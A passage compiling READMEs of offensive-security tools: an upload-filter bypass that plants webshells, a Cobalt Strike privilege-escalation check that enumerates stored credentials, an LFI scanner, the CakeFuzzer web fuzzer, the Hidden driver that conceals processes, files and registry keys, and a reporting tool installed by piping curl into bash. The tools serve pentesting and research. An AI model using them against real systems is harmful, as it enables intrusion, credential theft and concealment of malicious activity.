-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

 Required - Provide allowed extensions to be uploaded
 Usage: -a / --allowed jpeg,png,zip

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file will be uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate-limiting with milliseconds between each request.
Usage: -rl / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via a proxy client (e.g., Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -c / --continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

By: Zion3R


PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


PrivKit detects following misconfigurations

 Checks for Unquoted Service Paths
Checks for Autologon Registry Keys
Checks for Always Install Elevated Registry Keys
Checks for Modifiable Autoruns
Checks for Hijackable Paths
Enumerates Credentials From Credential Manager
Looks for current Token Privileges

Usage

[03/20 00:51:06] beacon> privcheck
[03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
[03/20 00:51:06] [*] Checking For Unquoted Service Paths..
[03/20 00:51:06] [*] Checking For Autologon Registry Keys..
[03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
[03/20 00:51:06] [*] Checking For Modifiable Autoruns..
[03/20 00:51:06] [*] Checking For Hijackable Paths..
[03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
[03/20 00:51:06] [*] Checking For Token Privileges..
[03/20 00:51:06] [+] host called home, sent: 10485 bytes
[03/20 00:51:06] [+] received output:
Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

Simply load the .cna file and type "privcheck".
If you want to compile it yourself you can use:
make all
or
x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

If you want to look for just one misconfiguration, you can use its object file with "inline-execute", for example:
inline-execute /path/tokenprivileges.o

Acknowledgement

Mr.Un1K0d3r - Offensive Coding Portal
https://mr.un1k0d3r.world/portal/

Outflank - C2-Tool-Collection
https://github.com/outflanknl/C2-Tool-Collection

dtmsecurity - Beacon Object File (BOF) Creation Helper
https://github.com/dtmsecurity/bof_helper

Microsoft :)
https://learn.microsoft.com/en-us/windows/win32/api/

HsTechDocs by HelpSystems(Fortra)
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm



LFI-FINDER - Tool Focuses On Detecting Local File Inclusion (LFI) Vulnerabilities

By: Zion3R

Written by TMRSWRR

Version 1.0.0

Instagram: TMRSWRR


How to use

LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.

This tool works with geckodriver: it scans URLs for LFI vulnerabilities and, when the text "root" appears on the page (for example, from /etc/passwd contents), it notifies you of the successful payload.

Installation

git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py

THIS IS FOR LATEST GOOGLE CHROME VERSION

Bugs and enhancements

For bug reports or enhancements, please open an issue here.

Copyright 2023



Artemis - APK Infrastructure Investigator

By: Zion3R

Overview

A tool for finding APK infrastructure.

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organize our activities around the prevention of corporate, industrial, and laboratory cyber threats.


Installation

pip install -r requirements.txt  
python main.py

Command Line Options

          
--help      Display help
--path      Required - path of the APK file
--manifest  Display manifest information
--infra     Find all infra addresses, including ip and domain, ex. --infra ip,domain
--whois     Whois all infra, including ip and domain, ex. --whois ip,domain
--output    Set the output file, ex. --output out.txt

Usage

Display Manifest


IP Whois


Example Usage:

1. Find infra (domain and ip) in sample4.apk and save the output to out.txt:

python3 main.py --path sample4.apk --infra domain,ip --output out.txt

2. Investigate the domain and IP whois of the APK:

python3 main.py --path sample.apk --whois ip


Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions

By: Zion3R


This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.

    Requirements

    • Python 3.x
    • requests library: you can install it by running pip install requests.
    • winsound module: available by default on Windows.

    How to Run

    • Make sure you have Python 3.x installed on your system.
    • pip install -r requirements.txt
    • Clone or download the script file wallet_transaction_monitor.py from this repository.
    • Place the sound file (in .wav format) you want to use for the notification in the same directory as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.
    • Open a terminal or command prompt and navigate to the directory where the script is located.
    • Run the script by executing the following command:
    python wallet_transaction_monitor.py

    The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.
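    As a minimal sketch of the mechanism described above (the address and polling interval are placeholders; the blockchain.info plain-text balance endpoint and the winsound call are the pieces the script's description names):

    import time
    import requests
    import winsound  # Windows-only; ships with CPython

    ADDRESS = "your_bitcoin_address_here"  # placeholder wallet address

    def get_balance_satoshi(addr):
        # blockchain.info exposes a simple plain-text balance query endpoint
        r = requests.get("https://blockchain.info/q/addressbalance/" + addr, timeout=10)
        r.raise_for_status()
        return int(r.text)

    last = get_balance_satoshi(ADDRESS)
    while True:
        time.sleep(60)  # poll once per minute
        current = get_balance_satoshi(ADDRESS)
        if current != last:
            winsound.PlaySound("soundfile.wav", winsound.SND_FILENAME)  # the .wav named above
            last = current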

    Important Notes

    This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the Blockchain.info API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.



    CakeFuzzer - Automatically And Continuously Discover Vulnerabilities In Web Applications Created Based On Specific Frameworks

    By: Zion3R


    Cake Fuzzer is a project that is meant to help automatically and continuously discover vulnerabilities in web applications created based on specific frameworks with very limited false positives. Currently it is implemented to support the Cake PHP framework.

    If you would like to learn more about the research process check out this article series: CakePHP Application Cybersecurity Research


    Project goals

    Typical approaches to discovering vulnerabilities using automated tools in web applications are:

    • Static Application Security Testing (SAST) – Method that involves a scanner detecting vulnerabilities based on the source code without running the application
    • Dynamic Application Security Testing (DAST) – Method that incorporates a vulnerability scanner that attacks the running application and identifies the vulnerabilities based on the application responses

    Both methods have disadvantages. SAST results in a high percentage of false positives – findings that are either not vulnerabilities or not exploitable vulnerabilities. DAST results in fewer false positives but discovers fewer vulnerabilities due to the limited information. It also requires some knowledge about the application and a security background of a person who runs a scan. This often comes with a custom scan configuration per application to work properly.

    The Cake Fuzzer project is meant to combine the advantages of both approaches and eliminate the above-mentioned disadvantages. This approach is called Interactive Application Security Testing (IAST).

    The goals of the project are:

    • Create an automated process of discovering vulnerabilities in applications based on the CakePHP Framework
    • No application knowledge requirement or pre-configuration of the web application
    • Result with minimal or close to 0 amount of false positives
    • Require minimal security knowledge to run the scanner

    Note: Some classes of vulnerabilities are not the target of the Cake Fuzzer, therefore Cake Fuzzer will not be able to detect them. Examples of those classes are business logic vulnerabilities and access control issues.

    Architecture

    Overview

    Drawio: Cake Fuzzer Architecture

    Cake Fuzzer consists of 3 main (fairly independent) servers that in total allow for dynamic vulnerability testing of CakePHP applications.

    • AttackQueue - Scheduling and execution of attack scenarios.
    • Monitors - Monitoring of given entities (executor outputs / file contents / processes / errors ).
    • Registry - Storage and classification of found vulnerabilities.

    They run independently. AttackQueue can add new scanners to monitors, and Monitors can schedule new attacks (e.g., based on a found vulnerability, to further attack the application).

    Other components include:

    • Fuzzer - defines and schedules attacks to AttackQueue (serves as the entry point)
    • Configuration - sets up application-dependent info (e.g., path to the CakePHP application)
    • Instrumentation - based on the configuration, defines changes to the application/OS to prepare the ground for attacks.

    Approach

    Cake Fuzzer is based on the concept of Interactive Application Security Testing (IAST). It contains a predefined set of attacks that are randomly modified before execution. Cake Fuzzer has knowledge of the application internals thanks to the CakePHP framework, therefore the attacks will be launched on all possible entry points of the application.

    During the attack, the Cake Fuzzer monitors various aspects of the application and the underlying system such as:

    • network connection,
    • file system,
    • application response,
    • error logs.

    These sources of information allow Cake Fuzzer to identify more vulnerabilities and report them with higher certainty.

    Requirements

    Development environment using MISP on VMWare virtual machine

    The following section describes steps to setup a Cake Fuzzer development environment where the target is outdated MISP v2.4.146 that is vulnerable to CVE-2021-41326.

    Requirements

    • VMWare Workstation (Other virtualization platform can be used as long as they support sharing/mounting directories between host and guest OS)

    Steps

    Run the following commands on your host operating system to download an outdated MISP VM:

    cd ~/Downloads # Or wherever you want to store the MISP VM
    wget https://vm.misp-project.org/MISP_v2.4.146@0c25b72/MISP_v2.4.146@0c25b72-VMware.zip -O MISP.zip
    unzip MISP.zip
    rm MISP.zip
    mv VMware/ MISP-2.4.146

    Conduct the following actions in VMWare GUI to prepare sharing Cake Fuzzer files between your host OS and MISP:

    1. Open virtual machine in VMWare and go to > Settings > Options > Shared Folders > Add.
    2. Mount directory where you keep Cake Fuzzer on your host OS and name it cake_fuzzer on the VM.
    3. Start the VM.
    4. Note the IP address displayed in the VMWare window after MISP fully boots up.

    Run the following commands on your host OS (replace MISP_IP_ADDRESS with previously noted IP address):

    ssh-copy-id misp@MISP_IP_ADDRESS
    ssh misp@MISP_IP_ADDRESS

    Once you SSH into the MISP run the following commands (in MISP terminal) to finish setup of sharing Cake Fuzzer files between host OS and MISP:

    sudo apt update
    sudo apt-get -y install open-vm-tools open-vm-tools-desktop
    sudo apt-get -y install build-essential module-assistant linux-headers-virtual linux-image-virtual && sudo dpkg-reconfigure open-vm-tools
    sudo mkdir /cake_fuzzer # Note: This path is fixed as it's hardcoded in the instrumentation (one of the patches)
    sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000
    ls -l /cake_fuzzer # If everything went fine you should see content of the Cake Fuzzer directory from your host OS. Any changes on your host OS will be reflected inside the VM and vice-versa.

    Prepare MISP for simple testing (in MISP terminal):

    CAKE=/var/www/MISP/app/Console/cake
    SUDO='sudo -H -u www-data'
    $CAKE userInit -q
    $SUDO $CAKE Admin setSetting "Security.password_policy_length" 1
    $SUDO $CAKE Admin setSetting "Security.password_policy_complexity" '/.*/'
    $SUDO $CAKE Password admin@admin.test admin --override_password_change

    Finally instal Cake Fuzzer dependencies and prepare the venv (in MISP terminal):

    source /cake_fuzzer/precheck.sh

    Contribution to Vulnerability Database

    Cake Fuzzer scans for the vulnerabilities defined inside the /cake_fuzzer/strategies folder.

    To add a new attack, we need to add a new new-attack.json file to the strategies folder. Each vulnerability contains 2 major fields: Scenarios and Scanners. Scenarios store the base forms of the attack payloads. Scanners, on the other hand, define the regexes or phrases used to detect indications in the response, stdout, stderr, logs, and results.

    Creating payload for Scenarios

    To create a payload, you first need to understand the vulnerability and how to detect it with as few payloads as possible.

    • While constructing the scenario you should aim for as generic a payload as possible. However, the more generic the payload, the higher the chance that it will produce false positives.

    • It is preferable to use a canary value such as __cakefuzzer__new-attack_§CAKEFUZZER_PAYLOAD_GUID§__ in your scenarios. A canary value contains a fixed string (for example: __cakefuzzer__new-attack_) and a dynamic identifier that is changed dynamically by the fuzzer (the GUID part §CAKEFUZZER_PAYLOAD_GUID§). The first canary part is used to ensure that the payload is detected by Scanners. The second canary part, the GUID, is translated to a pseudo-random value on every execution of your payload. So whenever your payload is injected into a parameter used by the application, the canary will be changed to something like __cakefuzzer__new-attack_8383938__, where 8383938 is unique across all other attacks.

    Detecting and generating Scanners

    To create a scanner, you first need to understand how the application may behave when the vulnerability is triggered. There are a few scanner types that you can use, such as response, stderr, logs, files, and processes. Each scanner serves a different purpose.

    For example, when you build a scanner for an XSS, you will look for the indication of the vulnerability in the HTML response of the application. You can use the ResultOutputScanner to look for the canary value and payload. On the other hand, SQL injection vulnerabilities can be detected via error logs. For that purpose you can use the LogFilesContentsScanner and ResultErrorsScanner.

    • One of the important points of creating a scanner is finding a regular expression or a phrase that does not catch false-positive values. If you want to contribute a new vulnerability, you should ensure that there are no false positives when using the new vulnerability in scans.
    • The last attribute of these Scanner regular expressions is efficiency. Avoid regexes that match all cases (.* or .+); they are very time consuming and drastically increase the time required to finish the entire scan.
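    Putting the two halves together, a heavily simplified, hypothetical new-attack.json sketch (the field layout is inferred from the description above; copy the exact schema from an existing file in /cake_fuzzer/strategies):

    {
      "Scenarios": [
        "__cakefuzzer__new-attack_§CAKEFUZZER_PAYLOAD_GUID§__"
      ],
      "Scanners": [
        {
          "type": "ResultOutputScanner",
          "regex": "__cakefuzzer__new-attack_[0-9]+__"
        }
      ]
    }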

    Efficiency

    As mentioned before, efficiency is an important part of the vulnerability definitions. Both Scenarios and Scanners should include as few elements as possible. This is because Cake Fuzzer executes every single scenario in all possible detected paths multiple times. Moreover, all responses, new log entries, etc. are constantly checked by the Scanners. A lot of parameters, paths, and end-points are usually detected, therefore every additional payload or Scanner affects the efficiency quite a lot.

    Removing Specific Vulnerability

    If you do not want to scan for a specific vulnerability class, remove the specified JSON file from the strategies folder, clean the database, and run the fuzzer again.

    For example, if you do not want to scan your application for SQL injection vulnerabilities, do the following steps:

    First of all, remove the already prepared attack scenarios. To achieve this, delete all files inside the /cake_fuzzer/databases folder:

    rm  /cake_fuzzer/databases/*

    After that, remove the sqlinj.json file from /cake_fuzzer/strategies:

    rm /cake_fuzzer/strategies/sqlinj.json

    Finally, re-run the fuzzer and all Cake Fuzzer processes; no SQL injection attacks will be executed.

    PoC Usage

    Installation

    Clone the repository

    git clone https://github.com/Zigrin-Security/CakeFuzzer /cake_fuzzer

    Warning: Cake Fuzzer won't work properly if it's under a different path than /cake_fuzzer. Keep in mind that it has to be placed under the root directory of the file system, next to /root, /tmp, and so on.

    Change directory to the repository

    cd /cake_fuzzer

    Venv

    Enter virtual environment if you are not already in:

    source /cake_fuzzer/precheck.sh

    OR

    source venv/bin/activate

    Configuration

    cp config/config.example.ini config/config.ini

    Configure config/config.ini:

    WEBROOT_DIR="/var/www/html"         # Path to the tested applications `webroot` directory
    CONCURRENT_QUEUES=5 # [Optional] Number of attacks executed concurrently at once
    ONLY_PATHS_WITH_PREFIX="/" # [Optional] Fuzzer will generate attacks only for paths starting with this prefix
    EXCLUDE_PATHS="" # [Optional] Fuzzer will exclude from scanning all paths that match this regular expression. If it's empty, all paths will be processed
    PAYLOAD_GUID_PHRASE="§CAKEFUZZER_PAYLOAD_GUID§" # [Optional] Internal keyword that is substituted right before attack with unique payload id
    INSTRUMENTATION_INI="config/instrumentation_cake4.ini" # [Optional] Path to custom instrumentations of the application.

    Execution

    Start component processes

    Warning: During the Cake Fuzzer scan, multiple functionalities of your application will be invoked in an uncontrolled manner multiple times. This may result in connections being issued to external services your application is connected to, and in data being pulled from or pushed to them. It is highly recommended to run Cake Fuzzer in an isolated, controlled environment without access to sensitive external services.

    Note: Cake Fuzzer bypasses blackholing, CSRF protections, and authorization. It sends all attacks with the privileges of the first user in the database. It is recommended that this user has the highest permissions.

    The application consists of several components.

    Warning All cake_fuzzer commands have to be executed as root.

    Before starting the fuzzer make sure your target application is fully instrumented:

    python cake_fuzzer.py instrument check

    If there are some unapplied changes apply them with:

    python cake_fuzzer.py instrument apply

    To run cake fuzzer do the following (It's recommended to use at least 3 separate terminal):

    # First Terminal
    python cake_fuzzer.py run fuzzer # Generates attacks, adds them to the QUEUE and registers new SCANNERS (then exits)
    python cake_fuzzer.py run periodic_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

    # Second terminal
    python cake_fuzzer.py run iteration_monitors # Responsible for monitoring (use CTRL+C to stop & exit at the end of the scan)

    # Third terminal
    python cake_fuzzer.py run attack_queue # Starts the ATTACK QUEUE (use CTRL+C to stop & exit at the end of the scan)

    # Once all attacks are executed
    python cake_fuzzer.py run registry # Generates `results.json` based on found vulnerabilities

    Note: There is currently a bug that can change the owner of logs (or any other dynamically changed files of the target web app). This may cause errors when normally using the web application, or even false negatives on future Cake Fuzzer executions. For MISP we recommend running the following after every execution of the fuzzer:

    sudo chown -R www-data:www-data /var/www/MISP/app/tmp/logs/

    Once your scan finishes revert the instrumentation:

    python cake_fuzzer.py instrument revert

    To Run Again

    To run Cake Fuzzer again, do the following:

    Delete the application's logs (for example, MISP logs are stored in /var/www/MISP/app/tmp/logs):

    rm  /var/www/MISP/app/tmp/logs/*

    Delete all files inside the /cake_fuzzer/databases folder:

    rm  /cake_fuzzer/databases/*

    Delete the /cake_fuzzer/results.json file (first, do not forget to save or examine the previous scan results):

    rm  /cake_fuzzer/results.json

    Finally, follow the previous running process again with 3 terminals; the sketch below consolidates the cleanup steps.
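
    A minimal reset sketch combining the cleanup steps above (the log path assumes a MISP target):

    rm /var/www/MISP/app/tmp/logs/*    # application logs
    rm /cake_fuzzer/databases/*        # fuzzer databases
    rm /cake_fuzzer/results.json       # previous results (save it first if needed)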

    FAQ / Troubleshooting

    Attack Queue seems like doing nothing

    The attack queue marks executed attacks in the database as 'executed', so to run the whole suite again you need to remove the database and add the attacks again.

    Make sure to kill monitors and attack queues before removing the database.

    rm database.db*
    python cake_fuzzer.py run fuzzer
    python cake_fuzzer.py run attack_queue

    Target app does not save logs to log files

    This is most likely because Cake Fuzzer operates as root, so new log files are created with root as the owner and the web application can no longer write to them. Make them writable again:

    chmod -R a+w /var/www/MISP/app/tmp/logs/*

    No files in /cake_fuzzer dir of a VM after a reboot

    If you use a VM and share the cake fuzzer directory with your host machine, make sure that the host directory is properly attached to the guest VM:

    sudo vmhgfs-fuse .host:/cake_fuzzer /cake_fuzzer -o allow_other -o uid=1000

    Target app crashes after running Cake Fuzzer

    Cake Fuzzer has to be located under the root directory of the machine, and the base directory name has to be cake_fuzzer specifically.

    mv CakeFuzzer/ /cake_fuzzer

    "Patch" errors while running instrument apply

    The instrumentation process is a part of the Cake Fuzzer execution flow. When you run instrument apply followed by instrument check, both of these commands should report the same number of changes.

    If you get any "patch" error, you can apply the patches manually and delete the problematic patch file, as sketched below. Patches are located under the /cake_fuzzer/cakefuzzer/instrumentation/patches directory.
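
    A minimal sketch of applying a single patch by hand; the file name problematic.patch is hypothetical, and the unified-diff format and -p1 strip level are assumptions, so check the patch header for the real paths first:

    cd /var/www/html    # the tested application's webroot from config.ini
    patch -p1 < /cake_fuzzer/cakefuzzer/instrumentation/patches/problematic.patch
    rm /cake_fuzzer/cakefuzzer/instrumentation/patches/problematic.patch    # so it's not re-applied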

    Dependency errors

    If you hit a Python dependency error while installing or running, manually install the dependencies after switching to the virtual environment.

    First, switch to the virtual environment:

    source venv/bin/activate

    After that you can install the dependencies with pip3:

    pip3 install -r requirements.txt




    Hidden - Windows Driver With Usermode Interface Which Can Hide Processes, File-System And Registry Objects, Protect Processes And Etc

    By: Zion3R

     


    Hidden has been developed as a solution for reverse engineering and research tasks. It is a Windows driver with a usermode interface which is used for hiding a specific environment on your Windows machine, such as installed reverse engineering tools (e.g. procmon, wireshark) or VM infrastructure (e.g. vmware tools).


    Features

    • hide registry keys and values
    • hide files and directories
    • hide processes (experimental, might not be stable)
    • protect specific processes
    • exclude specific processes from hiding and protection features
    • usermode interface (lib and cli) for working with a driver

    and so on

    System requirements

    Windows Vista and above, x86 and x64

    Recommended build environment

    • Visual Studio 2019
    • Windows Driver Kit 10

    Building

    The following guide explains how to make a release Win32 build:

    1. Open Hidden.sln using Visual Studio
    2. Build the Hidden Package project with the Release, Win32 configuration
    3. Open the build results folder <ProjectDir>\Release

    Installing

    1. Disable digital signature enforcement on a test machine (bcdedit /set TESTSIGNING ON) and reboot it
    2. Copy the files from <ProjectDir>\Release\Hidden Package to the test machine
    3. Right-click Hidden.inf and choose Install
    4. Start the driver (sc start hidden)
    5. Make sure the service is running (sc query hidden)

    Important: Keep in mind that the driver bitness has to match the OS bitness.
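
    If in doubt, you can check the OS bitness from a command prompt before installing; wmic is one standard built-in option:

    wmic os get osarchitecture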

    Hiding

    A command line tool, hiddencli, is used for managing the driver. You can use it for hiding and unhiding objects, changing the driver state, and so on.

    To hide a file, try the command:

    hiddencli /hide file c:\Windows\System32\calc.exe

    Want to hide a directory? No problem:

    hiddencli /hide dir "c:\Program Files\VMWare"

    Registry key?

    hiddencli /hide regkey "HKCU\Software\VMware, Inc."

    Maybe a process?

    hiddencli /hide pid 2340

    By a process image name?

    hiddencli /hide image apply:forall c:\Windows\Explorer.EXE

    To get full help, just type:

    hiddencli /help


    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R


    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!


    Your Benefits

    Write in markdown
    Design in HTML/VueJS
    Render your report to PDF
    Fully customizable
    Self-hosted or Cloud
    No need for Word

    SysReptor Cloud

    Do you just want to start reporting and save yourself all the effort of setting up, configuring and maintaining a dedicated server? Then SysReptor Cloud is the right choice for you! Get to know SysReptor on our Playground, and if you like it, you can get your personal Cloud instance here:

    Sign up here


    SysReptor Self-Hosted

    You prefer self-hosting? That's fine! You will need:

    • Ubuntu
    • Latest Docker (with docker-compose-plugin)

    You can then install SysReptor via script:

    curl -s https://docs.sysreptor.com/install.sh | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.




